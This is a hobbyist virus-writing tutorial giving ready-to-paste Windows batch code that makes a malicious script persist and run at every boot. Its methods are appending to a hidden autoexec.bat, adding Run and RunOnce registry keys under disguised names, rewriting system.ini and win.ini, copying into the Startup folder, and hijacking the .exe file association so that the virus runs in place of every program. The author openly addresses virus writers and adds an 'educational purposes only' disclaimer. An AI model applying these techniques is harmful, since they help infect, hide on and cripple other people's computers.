176 lines
8.9 KiB
Plaintext
176 lines
8.9 KiB
Plaintext
|
|
|
|
TUTORIAL:
|
|
|
|
+_+_+_+_ Batch Startup Techniques ++_+_+_+_+
|
|
|
|
by
|
|
|
|
cOrRuPt G3n3t!x
|
|
|
|
|
|
In this tutorial I will be discussing the different methods in which you can make your batch file execute
|
|
on startup, all of the ways depicted in this tutorial work on Windows Vista! It is essential for a proper
|
|
virus to startup each time the computer is booted so it can carry out it's routines on a frequent basis.
|
|
This tutorial is not for people trying to learn batch but rather for those trying to advance in batch!!
|
|
I would also like to send a big thanks to SAD1c for some of the code i used from his tutorials!!
|
|
|
|
|
|
1)Autoexec.bat Method:
|
|
-------------------
|
|
|
|
There are 2 differnt methods in autoexec.bat, we can either write the whole virus to autoexec.bat or
|
|
we can simply make a hook for autoexec.bat to call our virus. I personally prefer the hooking method, as
|
|
an oversized autoexec.bat may raise a few eyebrows, however, I shall illustrate both methods.
|
|
|
|
a)Copying whole virus to autoexec.bat (this should be put in the begining of your virus):
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
attrib -r -h C:\autoexec.bat
|
|
echo.@echo off>>C:\autoexec.bat
|
|
echo.echo my virus would be here>>C:\autoexec.bat
|
|
echo.pause>>C:\autoexec.bat
|
|
attrib +r +h C:\autoexec.bat
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
All you have to do is add your virus code lines in the lines where i put the 'echo my virus...' and
|
|
'pause' adding more lines as needed, it will then write your virus code to autoexec.bat
|
|
|
|
|
|
b)Hooking Autoexec.bat Technique (HAT):
|
|
|
|
This is my prefered method and it will copy the current batch file to C:\virus.bat and then hook
|
|
the batch file C:\virus.bat for the next startup (Should be placed at begining of Virus):
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
attrib -r -h C:\autoexec.bat
|
|
copy %0 C:\WinServ.bat >nul
|
|
type C:\autoexec.bat|find "WinServ.bat">C:\autoexec.bat
|
|
echo call C:\WinServ.bat>>C:\autoexec.bat
|
|
attrib +r +h C:\autoexec.bat
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
All you need to do is change the batch name from Winserv.bat to your own, what this code will do is
|
|
write a new hooking line each startup to make sure the batch only gets called up once per start up.
|
|
|
|
|
|
2)Registery Method:
|
|
----------------
|
|
|
|
This will show the various registery keys you could use to execute your batch file each run. Although
|
|
there are different registery keys doing different things, they will all - in practice - ultimately startup
|
|
your virus on each computer boot:
|
|
|
|
As I said before there are many variants; here are some:
|
|
|
|
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
|
|
|
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
|
|
|
|
- HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\RunServices
|
|
|
|
- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
|
|
|
|
- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
|
|
|
The "RunOnce" and "RunServicesOnce" deletes the registry key after running the file,
|
|
but this isn't a problem, because the batch file will be executed again, so it will add
|
|
the key. Now they all work on the same principle when adding the keys to the registery so
|
|
i shall now show you two keys the first is '-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
|
|
This will then add a registery key in HKLM startup called 'WinBoot' and the path of the virus will be C:\virus.bat:
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinBoot /t REG_SZ /d C:\virus.bat
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
The name of the startup key and the location of the virus can be changed at will.
|
|
|
|
Next i will show the registery ADD key for HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
|
It works on the same principle except because we are dealling with HKEY_CURRENT_USER instead of HKEY_LOCAL_MACHINE
|
|
we then write 'REG ADD HKCU...." See below:
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinBoot /t REG_SZ /d C:\virus.bat
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
|
|
|
|
3)System.ini Method:
|
|
------------------
|
|
|
|
This method will make System.ini call your batch file up each startup, we cannot just write to the system.ini
|
|
as it will then delete whatever else was in their so instead we write a seperate file in %tmp% then
|
|
type it in to the sytem.ini pretty simple i'd say:
|
|
----------------------------------------------[Cut Here]---------------------------------------------
|
|
copy %0 %windir%\WinDebug.bat
|
|
find /v /i "[boot]"<%WiNDir%\system.ini>temp1.tmp
|
|
find /v /i "shell=explorer.exe"<temp1.tmp>temp2.tmp
|
|
echo [boot]>%wIndIR%\system.ini
|
|
echo Shell=Explorer.exe WinDebug.bat>>%wiNdIR%\system.ini
|
|
type temp2.tmp>>%WIndIR%\system.ini
|
|
del temp?.tmp
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
|
|
|
|
4)Win.ini Method:
|
|
---------------
|
|
|
|
We shall now do the same for win.ini; write to a temporary then type it into win.ini, see below:
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
copy %0 %windir%\TaskLoad.bat.
|
|
find /v /i "[windows]"<%windir%\win.ini>temp1.tmp
|
|
find /v /i "load="<temp1.tmp>temp2.tmp
|
|
find /v /i "run="<temp2.tmp>temp1.tmp
|
|
find /v /i "NullPort="<temp1.tmp>temp2.tmp
|
|
echo [windows]>%wiNdIR%\win.ini
|
|
echo load=TaskLoad.bat>>%winDIr%\win.ini
|
|
echo run=>>%wINDir%\win.ini
|
|
echo NullPort=None>>%windIr%\win.ini
|
|
type temp2.tmp>>%wiNDir%\win.ini
|
|
del temp?.tmp
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
|
|
|
|
5)Startup Folder Method:
|
|
---------------------
|
|
|
|
We will now look at the simplest and not very effective method as most computer literate people will look here
|
|
for any application that starts up, but still effective, however, i could not get it to write to windows
|
|
Vista startup folder, i have done it before but for the life of me i cannot remember the technique i used
|
|
so for now this method will only work on XP:
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
Copy %0 C:\WinBoot.bat
|
|
copy C:\WinBoot.bat "%UserProfile%\Start Menu\Programs\Startup\"
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
|
|
|
|
6)Shell Spawning:
|
|
---------------
|
|
|
|
Shell spawning was first seen in SAD1c's BOM batch generator, what it does is associate our batch file
|
|
with the extension of an .exe or anything else we give it, so each time an .exe is opened, it will then
|
|
instead open our batch file and the .exe wont be opened, a very good way to keep our batch in memory.
|
|
I tried out SAD1c's Shell spawn and it did not gel to well with my windows vista, so instead i made my
|
|
own; similar but alot smaller and less complex:
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
copy %0 C:\WinBat.bat
|
|
echo.on error resume next>temp.vbs
|
|
echo set sh=createobject("wscript.shell")>>temp.vbs
|
|
echo sh.regwrite "HKCR\exefile\Shell\Open\Command\","wscript.exe C:\CmdLoad.vbs ""%%1 %%*""">>temp.vbs
|
|
cscript temp.vbs
|
|
del temp.vbs
|
|
echo.set shell = createobject("wscript.shell")>>C:\CmdLoad.vbs
|
|
echo.shell.run "C:\WinBat.bat">>C:\CmdLoad.vbs
|
|
-----------------------------------------------[Cut Here]---------------------------------------------
|
|
It is important to take into account, that alot of .exe's will be executed therefore your batch will
|
|
untechnically have residency, so if your batch is set to send over p2p etc and it is contionusly executed
|
|
this could slow down systems even to a halt!! We therefore should make parameters, and if they are
|
|
met then only is the batch routine executed.
|
|
|
|
|
|
Thanks alot for taking your time to read this, i hope it will help you with further ventures into more awesome
|
|
batch virii. Please contact me for any queries, problems etc. REMEMBER THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY!!
|
|
|
|
|
|
|
|
[?]Contact Me:
|
|
-----------
|
|
|
|
[@]immortalassassin@rocketmail.com
|
|
|
|
|
|
|
|
|
|
|